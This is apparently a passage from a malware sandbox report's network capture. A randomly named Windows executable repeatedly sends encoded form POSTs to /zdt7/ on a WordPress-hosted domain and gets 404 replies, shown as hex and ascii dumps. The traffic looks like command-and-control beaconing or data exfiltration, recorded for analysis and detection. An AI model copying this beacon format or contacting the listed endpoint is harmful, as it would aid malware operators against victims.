                                                                                                                                          Origin: http://www.meanttobebroken.org
                                                                                                                                          Referer: http://www.meanttobebroken.org/zdt7/
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Content-Length: 201
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                                                                          Data Raw: 6e 38 43 30 3d 44 66 61 7a 76 70 70 51 61 4c 44 51 46 39 43 57 6f 56 6e 74 42 49 72 30 2f 43 45 51 72 68 53 39 79 73 6f 44 47 33 43 6d 71 4d 46 74 45 62 4c 48 63 79 63 55 59 41 6b 33 69 6a 4a 54 57 46 39 77 59 74 67 4b 65 56 35 6a 37 72 70 41 6a 59 6a 69 56 69 33 4d 2b 69 70 35 51 56 74 46 72 41 31 30 6f 64 41 34 6e 49 64 66 59 36 35 63 37 34 69 64 47 34 45 2f 52 66 32 38 6a 73 59 4e 47 6b 7a 4f 6f 4a 44 39 6e 62 7a 4c 4e 53 45 71 35 77 4e 6d 66 67 58 57 58 56 55 6b 41 39 2f 70 70 50 5a 69 57 53 79 55 34 43 39 65 2f 4c 48 32 6d 5a 39 46 52 77 41 4c 46 75 79 75 57 44 51 5a 33 6d 66 53 5a 77 3d 3d
                                                                                                                                          Data Ascii: n8C0=DfazvppQaLDQF9CWoVntBIr0/CEQrhS9ysoDG3CmqMFtEbLHcycUYAk3ijJTWF9wYtgKeV5j7rpAjYjiVi3M+ip5QVtFrA10odA4nIdfY65c74idG4E/Rf28jsYNGkzOoJD9nbzLNSEq5wNmfgXWXVUkA9/ppPZiWSyU4C9e/LH2mZ9FRwALFuyuWDQZ3mfSZw==
                                                                                                                                          Nov 14, 2024 16:29:19.004451036 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                          Date: Thu, 14 Nov 2024 15:29:18 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          x-powered-by: WP Engine
                                                                                                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                          Link: <https://meanttobebroken.org/wp-json/>; rel="https://api.w.org/"
                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e28094c38734779-DFW
                                                                                                                                          Content-Encoding: gzip
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          Data Raw: 31 36 65 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d4 3c db 72 db 38 96 cf f6 57 c0 4c 8d 2d 4e 78 d7 c5 b6 24 3a dd 49 a7 a7 b2 db e9 f4 76 9c 9a da 8a 53 2e 88 84 28 d8 24 c1 06 20 cb 1a b5 5e f6 2f f6 69 7f 71 3f 61 eb 00 94 44 c9 94 ac d8 9e dd da 54 b7 6d 02 e7 8e 73 0e 6e 3c ec 1f c5 2c 92 d3 82 a0 91 cc d2 8b c3 3e fc 42 29 ce 93 d0 20 b9 fd e5 b3 01 6d 04 c7 17 87 07 fd 8c 48 8c a2 11 e6 82 c8 d0 f8 72 f9 b3 7d 66 2c db 73 9c 91 d0 b8 a3 64 52 30 2e 0d 14 b1 5c 92 5c 86 c6 84 c6 72 14 c6 e4 8e 46 c4 56 0f 16 a2 39 95 14 a7 b6 88 70 4a 42 5f 51 49 69 7e 8b 38 49 43 a3 e0 6c 48 53 62 a0 11 27 c3 d0 18 49 59 88 ae eb 26 59 91 38 8c 27 ee fd 30 77 fd 4d 24 21 a7 29 11 23 42 e4 26 de 58 10 07 54 bc a5 d2 c9 89 74 59 cc 4e 87 f4 c6 89 84 30 2e 0e d7 88 e0 a2 48 89 2d d9 38 1a d9 34 62 b9 81 04 fd 07 11 a1 e1 9f 79 f7 fe 99 57 25 dd 75 dd 8c e0 5c 4a 36 20 03 ce 6e 49 ae 84 9b 14 76 a9 ba 2b 47 24 23 c2 c5 64 90 49 39 70 87 f8 0e 68 ba 9b 4c 9c 22 4f 36 94 d1 bc 41 e8 d0 a0 19 4e 88 0b 30 0b 61 9a c1 [TRUNCATED]
                                                                                                                                          Data Ascii: 16eb<r8WL-Nx$:IvS.($ ^/iq?aDTmsn<,>B) mHr}f,sdR0.\\rFV9pJB_QIi~8IClHSb'IY&Y8'0wM$!)#B&XTtYN0.H-84byW%u\J6 nIv+G$#dI9phL"O6AN0a}3xQr{r(5rd8C"0TgBKm9/1vAG%)=E%M;0jy&?#Fc,Isl!"8cbR[?c1jN9Bb.OLN&',It"/iFEH.Fh>%x;8#a~YM;'X!L+N(<)'oNu=98XL(|Lz7Q(,d2qeLXj8<yM_io\b\.!qc";7lb,6U:GO
                                                                                                                                          Nov 14, 2024 16:29:19.004467010 CET212INData Raw: df 9d 98 bd be 5b 9a 5b db 1e c6 e6 7d 1e 6f 1b 9f b5 c1 3e e1 6c c0 a4 38 59 8e f3 49 ce 68 1e 93 7b 0b 0d 59 9a b2 c9 09 72 15 0a 10 bd 1c 51 81 c0 f1 11 15 88 15 92 66 f4 1f 24 46 13 2a 47 48 8e 08 fa 77 86 85 44 9f df 7f 42 45 3a 4e 68 8e ee
                                                                                                                                          Data Ascii: [[}o>l8YIh{YrQf$F*GHwDBE:Nh#-5eq U%)'L!1G$VO44XM&S(U`[]]+!$JghD2l'
                                                                                                                                          Nov 14, 2024 16:29:19.004488945 CET1236INData Raw: 1c 17 23 e3 62 66 fc a0 38 dc 4b a3 bb 9c ab 34 08 e4 16 c3 32 7e d0 90 dd af 33 e3 07 e0 61 74 8d bf 93 c1 67 2a 09 74 d2 b8 82 57 97 9c 5e 4d c8 40 68 e0 31 4f 1f 01 36 2c 43 69 dd ad d3 d6 32 62 a2 75 a5 2c 37 ba 86 61 19 05 03 db 50 9c fe 18
                                                                                                                                          Data Ascii: #bf8K42~3atg*tW^M@h1O6,Ci2bu,7aPyB]%h.l$+R,#2L(ZHNdn-1ScI!1f4'Vu>Gj8saF'z8UAEaraMg,?v
                                                                                                                                          Nov 14, 2024 16:29:19.004498959 CET1236INData Raw: 97 be 52 6d ad 4c 4e 8b 9c 38 4e d3 79 43 09 7b 94 9b 33 90 79 6b 14 1d 1f d7 f5 6d 04 4a 3d d0 97 df 7f 39 3e fe f2 fb 2f a5 f7 7d 52 b2 ab c6 3a e8 b7 29 1b 98 2b 73 1b 05 13 f2 23 11 02 27 a4 61 bc 1e 3a 92 7d 56 53 6e c3 7c 6d 34 8c d7 5f 37
                                                                                                                                          Data Ascii: RmLN8NyC{3ykmJ=9>/}R:)+s#'a:}VSn|m4_7faaZUT972i+w5D{psoh5D`n_q;,NaFrr3cK6 +CVasbxC>9"*o!*1.m=>^t8
                                                                                                                                          Nov 14, 2024 16:29:19.004514933 CET1236INData Raw: 6d b5 da 26 6a 2f 98 7b a7 96 67 75 82 bd 7d 34 1e 8b db 3d 54 6c 5a be 1f ac 54 3c 3f 87 a4 e0 9f 07 2b ce 9d b6 75 76 06 d1 fa 18 6b 95 2b 59 44 1e c9 06 8a 6f 4b f1 5e f1 3d 0b 54 7a 0a fc 0a 63 18 ef ce a9 e5 9f 3d 1a 98 24 05 7f a4 11 34 09
                                                                                                                                          Data Ascii: m&j/{gu}4=TlZT<?+uvk+YDoK^=Tzc=$4(JM5~e4|i~|c-\pv,/vApE.X+x&<"i84HtH"GE94vy]vNZwv:G*
                                                                                                                                          Nov 14, 2024 16:29:19.004525900 CET636INData Raw: 0f bb af af 53 96 30 a1 a0 0e fa 78 8f 81 34 4a 77 63 19 31 2e fa 34 4b f6 71 fe 2d b1 ad eb 05 dd 4c 0e 06 36 c8 61 db 53 02 b5 e3 aa d4 10 e1 74 59 fd 7c c9 d0 db 55 f5 f3 36 35 6c 1b a8 82 ed b1 d6 47 14 38 df ae b4 1d c3 52 1b 4c d4 77 01 b2
                                                                                                                                          Data Ascii: S0x4Jwc1.4Kq-L6aStY|U65lG8RLw648 %$IYVDK}h1Sj|4nit[~A6iJK'*"k~+%f(P?88}wk.kZ9.bK/(.>H2v+PJoU>
                                                                                                                                          Nov 14, 2024 16:29:19.004539967 CET604INData Raw: 46 28 44 8b 1a 96 ca 57 60 de 4e 3f c4 0d b4 45 62 b3 77 78 b0 ac 85 64 b9 96 e7 dd 08 8e 6f 34 fd 03 3a 44 8d 25 07 47 8b 28 be ae 5a b4 90 24 fe 00 9f 4b 41 df 74 69 1e 3a 0a 43 74 72 82 34 89 83 a5 54 cb dc 03 b3 12 0a 55 42 5a d1 54 4f b5 f4
                                                                                                                                          Data Ascii: F(DW`N?Ebwxdo4:D%G(Z$KAti:Ctr4TUBZTOvde"+IH{s^gOfQered5-SryL8`-FlcfQWr`/~}=8E5/f5:`l_AU"7Yh#2`V-W"OT+q=Hq~ka-


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          18192.168.2.450020141.193.213.1180928C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Nov 14, 2024 16:29:20.778091908 CET711OUTPOST /zdt7/ HTTP/1.1
                                                                                                                                          Host: www.meanttobebroken.org
                                                                                                                                          Accept: */*
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Origin: http://www.meanttobebroken.org
                                                                                                                                          Referer: http://www.meanttobebroken.org/zdt7/
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Content-Length: 221
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                                                                          Data Raw: 6e 38 43 30 3d 44 66 61 7a 76 70 70 51 61 4c 44 51 44 74 79 57 72 30 6e 74 4a 49 71 47 37 79 45 51 68 42 54 30 79 73 6b 44 47 79 69 32 71 35 74 74 45 37 37 48 47 32 49 55 62 41 6b 33 71 44 4a 57 4a 56 38 79 59 74 6b 43 65 55 46 6a 37 71 4a 41 6a 5a 54 69 4a 42 76 50 73 69 70 37 62 31 74 48 7a 67 31 30 6f 64 41 34 6e 4d 38 77 59 36 52 63 36 4c 36 64 4a 35 45 38 63 2f 32 2f 7a 38 59 4e 43 6b 79 48 6f 4a 44 54 6e 61 76 74 4e 57 30 71 35 78 39 6d 65 30 37 52 65 56 55 39 45 39 2b 45 6e 50 4d 75 51 53 4c 48 36 41 35 6e 69 4b 33 77 6e 66 77 66 41 42 68 63 58 75 57 64 4c 45 5a 74 36 6c 69 62 43 77 67 61 7a 78 68 32 53 69 50 67 6d 55 39 42 74 45 5a 54 39 75 49 3d
                                                                                                                                          Data Ascii: n8C0=DfazvppQaLDQDtyWr0ntJIqG7yEQhBT0yskDGyi2q5ttE77HG2IUbAk3qDJWJV8yYtkCeUFj7qJAjZTiJBvPsip7b1tHzg10odA4nM8wY6Rc6L6dJ5E8c/2/z8YNCkyHoJDTnavtNW0q5x9me07ReVU9E9+EnPMuQSLH6A5niK3wnfwfABhcXuWdLEZt6libCwgazxh2SiPgmU9BtEZT9uI=
                                                                                                                                          Nov 14, 2024 16:29:21.484559059 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                          Date: Thu, 14 Nov 2024 15:29:21 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          x-powered-by: WP Engine
                                                                                                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                          Link: <https://meanttobebroken.org/wp-json/>; rel="https://api.w.org/"
                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e28095c3a2ce817-DFW
                                                                                                                                          Content-Encoding: gzip
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          Data Raw: 31 36 65 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d4 3c db 72 db 38 96 cf f6 57 c0 4c 8d 2d 4e 78 d7 c5 b6 24 3a dd 49 a7 a7 b2 db e9 f4 76 9c 9a da 8a 53 2e 88 84 28 d8 24 c1 06 20 cb 1a b5 5e f6 2f f6 69 7f 71 3f 61 eb 00 94 44 c9 94 ac d8 9e dd da 54 b7 6d 02 e7 8e 73 0e 6e 3c ec 1f c5 2c 92 d3 82 a0 91 cc d2 8b c3 3e fc 42 29 ce 93 d0 20 b9 fd e5 b3 01 6d 04 c7 17 87 07 fd 8c 48 8c a2 11 e6 82 c8 d0 f8 72 f9 b3 7d 66 2c db 73 9c 91 d0 b8 a3 64 52 30 2e 0d 14 b1 5c 92 5c 86 c6 84 c6 72 14 c6 e4 8e 46 c4 56 0f 16 a2 39 95 14 a7 b6 88 70 4a 42 5f 51 49 69 7e 8b 38 49 43 a3 e0 6c 48 53 62 a0 11 27 c3 d0 18 49 59 88 ae eb 26 59 91 38 8c 27 ee fd 30 77 fd 4d 24 21 a7 29 11 23 42 e4 26 de 58 10 07 54 bc a5 d2 c9 89 74 59 cc 4e 87 f4 c6 89 84 30 2e 0e d7 88 e0 a2 48 89 2d d9 38 1a d9 34 62 b9 81 04 fd 07 11 a1 e1 9f 79 f7 fe 99 57 25 dd 75 dd 8c e0 5c 4a 36 20 03 ce 6e 49 ae 84 9b 14 76 a9 ba 2b 47 24 23 c2 c5 64 90 49 39 70 87 f8 0e 68 ba 9b 4c 9c 22 4f 36 94 d1 bc 41 e8 d0 a0 19 4e 88 0b 30 0b 61 9a c1 [TRUNCATED]
                                                                                                                                          Data Ascii: 16eb<r8WL-Nx$:IvS.($ ^/iq?aDTmsn<,>B) mHr}f,sdR0.\\rFV9pJB_QIi~8IClHSb'IY&Y8'0wM$!)#B&XTtYN0.H-84byW%u\J6 nIv+G$#dI9phL"O6AN0a}3xQr{r(5rd8C"0TgBKm9/1vAG%)=E%M;0jy&?#Fc,Isl!"8cbR[?c1jN9Bb.OLN&',It"/iFEH.Fh>%x;8#a~YM;'X!L+N(<)'oNu=98XL(|Lz7Q(,d2qeLXj8<yM_io\b\.!qc";7lb,6U:GO
                                                                                                                                          Nov 14, 2024 16:29:21.484580994 CET1236INData Raw: df 9d 98 bd be 5b 9a 5b db 1e c6 e6 7d 1e 6f 1b 9f b5 c1 3e e1 6c c0 a4 38 59 8e f3 49 ce 68 1e 93 7b 0b 0d 59 9a b2 c9 09 72 15 0a 10 bd 1c 51 81 c0 f1 11 15 88 15 92 66 f4 1f 24 46 13 2a 47 48 8e 08 fa 77 86 85 44 9f df 7f 42 45 3a 4e 68 8e ee
                                                                                                                                          Data Ascii: [[}o>l8YIh{YrQf$F*GHwDBE:Nh#-5eq U%)'L!1G$VO44XM&S(U`[]]+!$JghD2l'#bf8K42~3a
                                                                                                                                          Nov 14, 2024 16:29:21.484597921 CET424INData Raw: 9e 91 0c b3 27 d5 9e 87 58 d2 89 c9 90 f0 f0 c8 b3 a8 03 27 39 0e 2e 0a 92 c7 ef 46 34 8d 1b d2 9c d7 99 f9 37 ce 32 2a c8 f1 71 83 85 c6 a4 78 5f 9d d4 3e eb 5c 2b 0c 4b 84 5f 75 44 5a a5 57 7c b3 72 a7 4c c5 22 9c a9 98 97 23 9a 27 dd 23 cf 5a
                                                                                                                                          Data Ascii: 'X'9.F472*qx_>\+K_uDZW|rL"#'#Z=H!N1-_qqP!ah?}Na8&akaej k56fd13fHNJ~~ukyCNuR3RmLN8NyC{3ykmJ=
                                                                                                                                          Nov 14, 2024 16:29:21.484605074 CET1236INData Raw: 39 22 e6 2a e0 be ca 6f 21 f9 2a ab 31 e8 ac 82 2e ac 6d 3d 3e 5e c3 b7 74 38 1f 85 a1 04 d7 ad c3 58 05 6f f8 48 ff 06 6d b3 f7 6c 7a 47 15 08 10 d4 ca 9d 9f 3e 7d 84 6c 3c 0d 8f 7c 2b 77 38 fc f9 0e a7 e9 00 47 b7 d5 58 af 02 7a f3 07 66 5d ad
                                                                                                                                          Data Ascii: 9"*o!*1.m=>^t8XoHmlzG>}l<|+w8GXzf]EjjD-s673GN?W>,LydZ[ fpCrG[>7iqF4KIadj!xThvxpS[.Hf`.YM-F8fnx"d=j
                                                                                                                                          Nov 14, 2024 16:29:21.484621048 CET1236INData Raw: 76 80 9c 79 5d d4 76 bc 4e 0d 88 5a 77 db 76 8e e5 98 e3 b4 8b 3a c5 bd fa ff bc b8 47 2a 83 7b 16 2a ff 73 02 73 0b 76 4c 48 d1 45 3e 9c 6e aa 1f 6d af 06 bb b5 0d 5b 8c 30 2f 56 9c bd ef e1 cc c6 12 bc 32 5e 47 b7 9b 0b 1a 10 79 68 f5 c3 37 ad
                                                                                                                                          Data Ascii: vy]vNZwv:G*{*ssvLHE>nm[0/V2^Gyh7%:SS:Pax%'i&4^x6mx7=@~Nd"K W-7%W1hNlrtNAJ;P*fGE[]\gm
                                                                                                                                          Nov 14, 2024 16:29:21.484637022 CET424INData Raw: 6b 2e 6b 5a 39 15 2e a5 62 eb 1e af fa 4b f3 2f c4 28 2e 3e 48 94 32 76 2b 50 4a 6f 55 c9 3e bc 55 8f 26 58 94 a5 fb 58 22 09 6f 23 c3 07 01 40 77 07 7d c4 d3 01 41 92 4f 11 bc a9 cd 86 ea eb 05 90 36 05 1a 90 94 4d 10 e3 08 23 5d f2 fd a6 ef 16
                                                                                                                                          Data Ascii: k.kZ9.bK/(.>H2v+PJoU>U&XX"o#@w}AO6M#]ZqC(#rUDcL$(/t<2xA_U9!dGd,G#HQ~DQm<;,ZKKL+=qB$!a2)
                                                                                                                                          Nov 14, 2024 16:29:21.485101938 CET604INData Raw: 46 28 44 8b 1a 96 ca 57 60 de 4e 3f c4 0d b4 45 62 b3 77 78 b0 ac 85 64 b9 96 e7 dd 08 8e 6f 34 fd 03 3a 44 8d 25 07 47 8b 28 be ae 5a b4 90 24 fe 00 9f 4b 41 df 74 69 1e 3a 0a 43 74 72 82 34 89 83 a5 54 cb dc 03 b3 12 0a 55 42 5a d1 54 4f b5 f4
                                                                                                                                          Data Ascii: F(DW`N?Ebwxdo4:D%G(Z$KAti:Ctr4TUBZTOvde"+IH{s^gOfQered5-SryL8`-FlcfQWr`/~}=8E5/f5:`l_AU"7Yh#2`V-W"OT+q=Hq~ka-


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          19192.168.2.450021141.193.213.1180928C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Nov 14, 2024 16:29:23.326231956 CET10793OUTPOST /zdt7/ HTTP/1.1
                                                                                                                                          Host: www.meanttobebroken.org
                                                                                                                                          Accept: */*
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Origin: http://www.meanttobebroken.org
                                                                                                                                          Referer: http://www.meanttobebroken.org/zdt7/
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Content-Length: 10301
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                                                                          Data Raw: 6e 38 43 30 3d 44 66 61 7a 76 70 70 51 61 4c 44 51 44 74 79 57 72 30 6e 74 4a 49 71 47 37 79 45 51 68 42 54 30 79 73 6b 44 47 79 69 32 71 2f 31 74 45 71 62 48 46 52 6b 55 61 41 6b 33 67 6a 4a 58 4a 56 39 71 59 74 63 47 65 55 4a 5a 37 76 4e 41 68 2f 76 69 5a 77 76 50 6d 69 70 37 55 56 74 47 72 41 31 68 6f 64 51 43 6e 49 51 77 59 36 52 63 36 4d 43 64 41 49 45 38 65 2f 32 38 6a 73 59 2f 47 6b 79 76 6f 4a 4c 6c 6e 61 72 62 4d 6c 38 71 34 52 74 6d 54 68 58 52 43 46 55 2f 44 39 2b 63 6e 50 52 73 51 53 58 4c 36 42 64 42 69 4b 44 77 6d 49 59 49 48 67 35 54 43 59 43 35 5a 45 70 6d 2f 57 32 41 4e 67 6f 53 33 44 56 31 45 68 58 33 6b 48 55 32 78 47 31 48 2b 65 75 57 39 4b 39 2b 34 65 73 49 48 62 36 75 41 49 36 64 38 32 65 56 70 74 52 58 6f 61 6c 75 78 66 42 62 2f 61 69 4e 65 57 49 69 63 64 67 68 6d 63 52 64 75 53 56 71 75 53 4f 75 6d 53 74 6e 31 6a 32 31 37 79 4c 36 69 68 70 69 4b 36 70 39 30 4e 68 38 6a 74 51 65 44 6b 79 5a 45 78 52 66 4e 79 62 69 75 66 43 65 67 6f 4e 61 71 66 2f 43 4a 76 30 42 4c 30 68 4a 61 [TRUNCATED]
                                                                                                                                          Data Ascii: n8C0=DfazvppQaLDQDtyWr0ntJIqG7yEQhBT0yskDGyi2q/1tEqbHFRkUaAk3gjJXJV9qYtcGeUJZ7vNAh/viZwvPmip7UVtGrA1hodQCnIQwY6Rc6MCdAIE8e/28jsY/GkyvoJLlnarbMl8q4RtmThXRCFU/D9+cnPRsQSXL6BdBiKDwmIYIHg5TCYC5ZEpm/W2ANgoS3DV1EhX3kHU2xG1H+euW9K9+4esIHb6uAI6d82eVptRXoaluxfBb/aiNeWIicdghmcRduSVquSOumStn1j217yL6ihpiK6p90Nh8jtQeDkyZExRfNybiufCegoNaqf/CJv0BL0hJa5ASr2yyDngoaVvb7DznGQK6eZEjpxN6EC1IbFlgl7Yto0Z8H72n6c5lHWSLAcFIAndFFmACIzQU0eGAI7DmUiCW7N8pLPc5sxIoYcnunkrXfdInjPbQv9DGnU7tjnglTjlMogbZAJio8BoGpGF68xcv7Ao4QGn8yBqYiNYu0tCg6ulLeFNPW3r023NgLV2kIpGLBEMluyoENtmyI92OX25uRIfZMzw/rBE0pQdzAKQh9N5761J2PpDlfzqIMmKkHrZtvdJ2nRaOJ/EBO4jIEv4UjRmpUJOnEEkXhTONEPvHUzH5+FWCjdlHMthoDCZC4HuZSXy2+DFjSbIY7BqemmWOz0yx0kJgdZKMq0fMkpKAf24giI45LwOAv5om6e5NLBuZlU00afMRKWY9p709ZsDyztBvwUuUQN9mDmCrYxPJ4+Q7j6jCUKE1dAnJ/layQOrpL190H8yvrrDavDzpCruoZSdRi+YrDLasTsoWkQZIYLsTtQFcUFP5YV9g6bfxWyGU3D7qHkE7t+UzdS6jBYVxPOa9+d74De/0gX+BkmOLlInYXik7U4Y36nohUcJ1ZC4G3ONZAZ7uCKsQNdMx8JNWonuQyuEJt5b6wGWVF0sRqhpIl6T7Neso1MTiTQ9n8yJsRCs3OdwG52MMMMhG85wrY3JFbmXmLNr [TRUNCATED]
                                                                                                                                          Nov 14, 2024 16:29:24.044414043 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                          Date: Thu, 14 Nov 2024 15:29:23 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          x-powered-by: WP Engine
                                                                                                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                          Link: <https://meanttobebroken.org/wp-json/>; rel="https://api.w.org/"
                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e28096c09a63ab4-DFW
                                                                                                                                          Content-Encoding: gzip
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          Data Raw: 31 36 65 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d4 3c db 72 db 38 96 cf f6 57 c0 4c 8d 2d 4e 78 d7 c5 b6 24 3a dd 49 a7 a7 b2 db e9 f4 76 9c 9a da 8a 53 2e 88 84 28 d8 24 c1 06 20 cb 1a b5 5e f6 2f f6 69 7f 71 3f 61 eb 00 94 44 c9 94 ac d8 9e dd da 54 b7 6d 02 e7 8e 73 0e 6e 3c ec 1f c5 2c 92 d3 82 a0 91 cc d2 8b c3 3e fc 42 29 ce 93 d0 20 b9 fd e5 b3 01 6d 04 c7 17 87 07 fd 8c 48 8c a2 11 e6 82 c8 d0 f8 72 f9 b3 7d 66 2c db 73 9c 91 d0 b8 a3 64 52 30 2e 0d 14 b1 5c 92 5c 86 c6 84 c6 72 14 c6 e4 8e 46 c4 56 0f 16 a2 39 95 14 a7 b6 88 70 4a 42 5f 51 49 69 7e 8b 38 49 43 a3 e0 6c 48 53 62 a0 11 27 c3 d0 18 49 59 88 ae eb 26 59 91 38 8c 27 ee fd 30 77 fd 4d 24 21 a7 29 11 23 42 e4 26 de 58 10 07 54 bc a5 d2 c9 89 74 59 cc 4e 87 f4 c6 89 84 30 2e 0e d7 88 e0 a2 48 89 2d d9 38 1a d9 34 62 b9 81 04 fd 07 11 a1 e1 9f 79 f7 fe 99 57 25 dd 75 dd 8c e0 5c 4a 36 20 03 ce 6e 49 ae 84 9b 14 76 a9 ba 2b 47 24 23 c2 c5 64 90 49 39 70 87 f8 0e 68 ba 9b 4c 9c 22 4f 36 94 d1 bc 41 e8 d0 a0 19 4e 88 0b 30 0b 61 9a c1 [TRUNCATED]
                                                                                                                                          Data Ascii: 16e1<r8WL-Nx$:IvS.($ ^/iq?aDTmsn<,>B) mHr}f,sdR0.\\rFV9pJB_QIi~8IClHSb'IY&Y8'0wM$!)#B&XTtYN0.H-84byW%u\J6 nIv+G$#dI9phL"O6AN0a}3xQr{r(5rd8C"0TgBKm9/1vAG%)=E%M;0jy&?#Fc,Isl!"8cbR[?c1jN9Bb.OLN&',It"/iFEH.Fh>%x;8#a~YM;'X!L+N(<)'oNu=98XL(|Lz7Q(,d2qeLXj8<yM_io\b\.!qc";7lb,6U:GO
                                                                                                                                          Nov 14, 2024 16:29:24.044442892 CET1236INData Raw: df 9d 98 bd be 5b 9a 5b db 1e c6 e6 7d 1e 6f 1b 9f b5 c1 3e e1 6c c0 a4 38 59 8e f3 49 ce 68 1e 93 7b 0b 0d 59 9a b2 c9 09 72 15 0a 10 bd 1c 51 81 c0 f1 11 15 88 15 92 66 f4 1f 24 46 13 2a 47 48 8e 08 fa 77 86 85 44 9f df 7f 42 45 3a 4e 68 8e ee
                                                                                                                                          Data Ascii: [[}o>l8YIh{YrQf$F*GHwDBE:Nh#-5eq U%)'L!1G$VO44XM&S(U`[]]+!$JghD2l'#bf8K42~3a
                                                                                                                                          Nov 14, 2024 16:29:24.044461966 CET1236INData Raw: 9e 91 0c b3 27 d5 9e 87 58 d2 89 c9 90 f0 f0 c8 b3 a8 03 27 39 0e 2e 0a 92 c7 ef 46 34 8d 1b d2 9c d7 99 f9 37 ce 32 2a c8 f1 71 83 85 c6 a4 78 5f 9d d4 3e eb 5c 2b 0c 4b 84 5f 75 44 5a a5 57 7c b3 72 a7 4c c5 22 9c a9 98 97 23 9a 27 dd 23 cf 5a
                                                                                                                                          Data Ascii: 'X'9.F472*qx_>\+K_uDZW|rL"#'#Z=H!N1-_qqP!ah?}Na8&akaej k56fd13fHNJ~~ukyCNuR3RmLN8NyC{3ykmJ=
                                                                                                                                          Nov 14, 2024 16:29:24.044478893 CET1236INData Raw: 5b b2 f7 ac c0 3b b3 fc a6 f7 28 f7 1a 97 00 09 b6 b8 d7 2e 33 04 ed c0 f2 cf da 96 b7 32 03 34 b6 2d df 2b 1b bf 4b 14 cd 72 65 0d 15 12 bb f9 57 58 95 76 08 bc 53 ab d5 b1 5a 9d c7 98 c3 32 6b 39 14 78 0a 6c 1f 26 81 1d 83 10 34 cf ac f2 ff 95
                                                                                                                                          Data Ascii: [;(.324-+KreWXvSZ2k9xl&4t-eGsyftN-+h`+>[~CnjZji,k[g&:[uf>jA:~XAS>C+hyqS<?e^;S[Vm&j/{gu}4=TlZT<?
                                                                                                                                          Nov 14, 2024 16:29:24.044512033 CET848INData Raw: 9d 79 6b 83 79 09 b4 c9 7f 55 99 b6 28 1e c3 05 d5 e5 58 ee 3e 65 65 93 c2 86 52 51 55 50 56 21 f6 3e a6 f2 cb ef 1f ea 8b dc e2 b5 22 b7 df 3f ff b4 0f a3 fb 2c e5 45 e4 14 a3 e2 0d 17 b1 ae 5f 73 f5 a7 1d 0e 0f fb ea e2 a7 ac 56 25 9c 33 de f2
                                                                                                                                          Data Ascii: ykyU(X>eeRQUPV!>"?,E_sV%3ZhnP6h3mSE}:8#aYr;5hPbhxVJxGiwD0FZpW2)(FtaUQv+kP(rS0x4Jwc1.4Kq-
